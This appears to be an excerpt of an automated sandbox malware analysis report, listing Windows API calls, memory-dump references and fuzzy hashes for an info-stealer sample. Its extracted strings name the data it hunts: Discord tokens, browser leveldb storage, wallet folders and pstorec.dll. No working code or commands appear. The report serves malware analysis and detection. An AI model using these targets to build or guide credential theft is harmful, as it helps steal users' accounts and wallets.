                                                                                                                                                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,00416EA0,?,00000000,00000000), ref: 00413F6C
                                                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00413F78
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CreateObjectSingleSleepThreadWaitlstrcpy
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 309549813-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: a8e46a763f59d357cb157831e2caf77c99b8258767ef6419c4d21c1fd91626e4
                                                                                                                                                                                                                                                                                                  • Instruction ID: b65bf78c018c26f30e4a94ab22d84a19a40ae7d672281f86a08f23e214b62c4f
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a8e46a763f59d357cb157831e2caf77c99b8258767ef6419c4d21c1fd91626e4
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DA41B1312143409FD314EF61D895BDEB3E9ABC8304F40481EF48A97291DBBCAD89CB66
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00411CDD
                                                                                                                                                                                                                                                                                                  • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00411CF4
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00411CFB
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3183270410-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 640dad66fecb186e80dcf41244515ab4ac3902d155f7ecbd00ab4fd3f5a4e88e
                                                                                                                                                                                                                                                                                                  • Instruction ID: 17c2f96a6e384425bd33d4ac7292e407ff3d1e4c2ad55af778a65a8cd36ca61f
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 640dad66fecb186e80dcf41244515ab4ac3902d155f7ecbd00ab4fd3f5a4e88e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 77E092B13002107BD7206769AC4AFEB3A69AB85B55F040419F785CB2C0CAB598C083E2
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00411589
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: FolderPathlstrcpy
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1699248803-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 1160e0b7f1aa9f4cd5700b1ca12f0395d0d03c746d585bc572386d3e44047f0e
                                                                                                                                                                                                                                                                                                  • Instruction ID: 15d096accc25870f1c61d4fec85a6e9edf64df49f5c63818c5a2d69bf229bf11
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1160e0b7f1aa9f4cd5700b1ca12f0395d0d03c746d585bc572386d3e44047f0e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CAF030756443406BD2209B18DC85B6BB7A9EFC4755F00882DF68957381C6349C1586A6
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetFileAttributesA.KERNEL32(00000000,?,?,?,0040B1C7,?,?,0000001C,0042150A), ref: 00411535
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: bb211eadf6e2018455b62e0e4d58cc15ac1c3b02b046a00b78ea14b051ebdca4
                                                                                                                                                                                                                                                                                                  • Instruction ID: fe820049153354b6effd4291471353984c4611ada376a903b3c10ac4968f751e
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bb211eadf6e2018455b62e0e4d58cc15ac1c3b02b046a00b78ea14b051ebdca4
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 87D0A7773013225F4B006AEA2C948CF530DEBC0358741042FF50097100CA686D4B86F9
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • SHFileOperationA.SHELL32(?), ref: 00411F94
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: FileOperation
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3080627654-0
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,?,?,00000000,?,?,00416A58,00000000,00000000), ref: 004115D4
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AllocLocal
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3494564517-0
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 00415715
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000000,0098967F), ref: 00415723
                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00415739
                                                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 0041574A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,77355E70,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 004157D3
                                                                                                                                                                                                                                                                                                  • memcmp.MSVCRT(00000000,00000000,00000000,00000001), ref: 00415811
                                                                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 0041586B
                                                                                                                                                                                                                                                                                                  • memcmp.MSVCRT(00000000,00000000,00000000,0042113D,00000002,?,?,?,00000001), ref: 0041589C
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,0042113D,00000002,?,?,?,00000001), ref: 004158FF
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heapmemcmpstrlen$??3@AllocFileFindFirstProcessmemmovewsprintf
                                                                                                                                                                                                                                                                                                  • String ID: %s\%s$%s\*$5]A$C:\ProgramData\$Soft$\Discord\tokens.txt$\Local Storage\leveldb$\Local Storage\leveldb\CURRENT$\discord\
                                                                                                                                                                                                                                                                                                  • API String ID: 2833195460-599946814
                                                                                                                                                                                                                                                                                                  • Opcode ID: 22d85e5231fd5c98588da4317bc2df92ddf919f1e503bb07a89fd0dcdb54fc31
                                                                                                                                                                                                                                                                                                  • Instruction ID: 81ee40a3975c9a922aef849e5e8a3abd7cc697fd74e0cd7b6c267da97902711e
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 22d85e5231fd5c98588da4317bc2df92ddf919f1e503bb07a89fd0dcdb54fc31
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4502D571900618ABCB10EBB1CD85AEEB779BF48304F44015EF606A7151DB7CBAC5CBA9
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 0040BC5A
                                                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 0040BC6C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,77355E70,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 0040BCFE
                                                                                                                                                                                                                                                                                                  • memcmp.MSVCRT(00000000,00000000,00000000,00000001), ref: 0040BD2F
                                                                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 0040BD8B
                                                                                                                                                                                                                                                                                                  • memcmp.MSVCRT(00000000,00000000,00000000,0042113D,00000002,?,?,?,00000001), ref: 0040BDBC
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,0042113D,00000002,?,?,?,00000001), ref: 0040BE1F
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: memcmpstrlen$??3@FileFindFirstmemmovewsprintf
                                                                                                                                                                                                                                                                                                  • String ID: %s\*.*$.metadata-v2$C:\ProgramData\$PSk?$Plugins$Ph=$Wallets$W<?$\storage\default\$%@$+Q$N=$P>$V=$X>$]=$_>$d=$x>
                                                                                                                                                                                                                                                                                                  • API String ID: 3353021899-1404224526
                                                                                                                                                                                                                                                                                                  • Opcode ID: fa5d6ba3c41226117375902af091d81ba2687f047e57ace8c7f7fafacffe9852
                                                                                                                                                                                                                                                                                                  • Instruction ID: db501d22f0f1181e2ce2af52b6c83326310b215b830042a06cc2d5eef77a8b05
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fa5d6ba3c41226117375902af091d81ba2687f047e57ace8c7f7fafacffe9852
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 86425231A102189BDF04EBA1C9D59FE7769AF44308F4040AEF9066B192DF7CADC5C7A9
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • lstrcpyA.KERNEL32(?,?), ref: 0041DDB9
                                                                                                                                                                                                                                                                                                  • CreateFileA.KERNEL32 ref: 0041DECA
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,00000000), ref: 0041DEE8
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseCreateFileHandlelstrcpy
                                                                                                                                                                                                                                                                                                  • String ID: UT
                                                                                                                                                                                                                                                                                                  • API String ID: 3205445448-894488996
                                                                                                                                                                                                                                                                                                  • Opcode ID: 97c8584f83b454a8927c2d67e1d8cbb00a1e98983169f3ef51cd461a2be68698
                                                                                                                                                                                                                                                                                                  • Instruction ID: ac4f865b8f17060690429e4fd138a7650e313cba3034da994fc339625156bd58
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 97c8584f83b454a8927c2d67e1d8cbb00a1e98983169f3ef51cd461a2be68698
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1C12D2B5A087809FD721DF26C48479BBBE1AF95308F14482EE8C687352D738D985CB5A
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: memcpy$FileWrite
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3457131274-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 1f9a4faab0999b521a2636aa1cfc27af4b576a019f41c9991a71851e919e7845
                                                                                                                                                                                                                                                                                                  • Instruction ID: 75c582a46244fff173573742a7ab3bbcd042cdd94e8295cbfc9d5a78f2bf368e
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1f9a4faab0999b521a2636aa1cfc27af4b576a019f41c9991a71851e919e7845
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A03107F1A0474ABFD354DF25ED84AA7B7A8FB45308F44412AE84483B41E338F965CBA5
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetLocalTime.KERNEL32(?), ref: 0041D88A
                                                                                                                                                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 0041D894
                                                                                                                                                                                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0041D8AF
                                                                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041D914
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Time$FileSystem$LocalUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 568878067-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 4f298a821ac2bbf5d00ffec94eb5c8bc91ccbc5d341f049dbc5db8ff6588eb99
                                                                                                                                                                                                                                                                                                  • Instruction ID: 853963dc4ef663bce705e73e50dc6f04fde9a019ac164f808202a007976d34a8
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4f298a821ac2bbf5d00ffec94eb5c8bc91ccbc5d341f049dbc5db8ff6588eb99
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8A2100B28147109AE305CF29C8557B7BBE4FF94384F004A2EF0C29A252EB75D086D761
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(?,?,7622F360,?,?,?,00401320,pstorec.dll,?,?,?,004185FC), ref: 004011DA
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcmpi
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1586166983-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 82e18240206d58c3fc2370882c0ef2334e6b9da6ecc00cb1c851d96badb87713
                                                                                                                                                                                                                                                                                                  • Instruction ID: 1e243eb0cc245641358f316f4ded0038930a38816da4ddb4eced82cb662ad228
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 82e18240206d58c3fc2370882c0ef2334e6b9da6ecc00cb1c851d96badb87713
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 29E04F363013149BC6208B89ECC5D57BBAAEB8D7F4B5A4172EA045B326D275AC50CA64
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                  • Opcode ID: e350b9acc202ae44a8096b0a8b1f7fa9d4f6edb5150dc4f2344859e8333b814c
                                                                                                                                                                                                                                                                                                  • Instruction ID: 81a96ac3c5c45741fb44ce0365675c3fdd34da691af61be43d7ddf4b7eb2458a
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e350b9acc202ae44a8096b0a8b1f7fa9d4f6edb5150dc4f2344859e8333b814c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 59224CB57062998FCB35CF99C9805E9B7A2BF8A310F14852EDC4D8B351C734AA47DB42
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                  • Opcode ID: 31ef07464ef63a5c9c9cd39a0443a4b7d3b615bba5a9182160bf04083150539f
                                                                                                                                                                                                                                                                                                  • Instruction ID: 0d88d1c80d5cf604edfe207e3e975c6923d32c25b21c0e4bf53f94e4bddbbc5c
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 31ef07464ef63a5c9c9cd39a0443a4b7d3b615bba5a9182160bf04083150539f
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 55E18DB1B06A56ABC30A9F79C4805E5F7A5FF4A309B04832EE86C53242D7347467CBC6
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                  • Opcode ID: 8f64cdb3b1d29652fe465c7eda393228ef7c1b6854ad480e8303c0fc9060796f
                                                                                                                                                                                                                                                                                                  • Instruction ID: 4cfa1d93c302992564cd6e5d5855d4dbd855d3a9678cd46773ae9a1c723c4c6d
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8f64cdb3b1d29652fe465c7eda393228ef7c1b6854ad480e8303c0fc9060796f
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3AD1F975A253118BDB02DFB8C8C05D577A6AF96341B08C37EEC487F20BE738A4428B56
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040D080: lstrlenA.KERNEL32(?), ref: 0040D09D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040D080: strchr.MSVCRT ref: 0040D0B6
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040D080: strchr.MSVCRT ref: 0040D0CE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040D080: lstrlenA.KERNEL32(?), ref: 0040D0EA
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040D080: GetProcessHeap.KERNEL32 ref: 0040D0FB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040D080: HeapAlloc.KERNEL32(00000000,00000008,-00000001), ref: 0040D105
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040D080: strlen.MSVCRT ref: 0040D130
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040D080: strcpy_s.MSVCRT ref: 0040D184
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,00000000), ref: 0040D2BA
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000008,00000000), ref: 0040D2C4
                                                                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 0040D2D6
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040D2E2
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,-00000001), ref: 0040D2EC
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?), ref: 0040D318
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040D322
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040D332
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 0040D33C
                                                                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 0040D34E
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040D35A
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,-00000001), ref: 0040D364
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?), ref: 0040D385
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040D38F
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040D39F
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 0040D3A9
                                                                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 0040D3B7
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040D3C3
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,-00000001), ref: 0040D3CD
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040D3E4
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,-00000001), ref: 0040D3EE
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?), ref: 0040D40F
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040D419
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040D429
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 0040D433
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,0042150A,00000000), ref: 0040D7C4
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,0042150A,00000000), ref: 0040D811
                                                                                                                                                                                                                                                                                                  Memory Dump Source
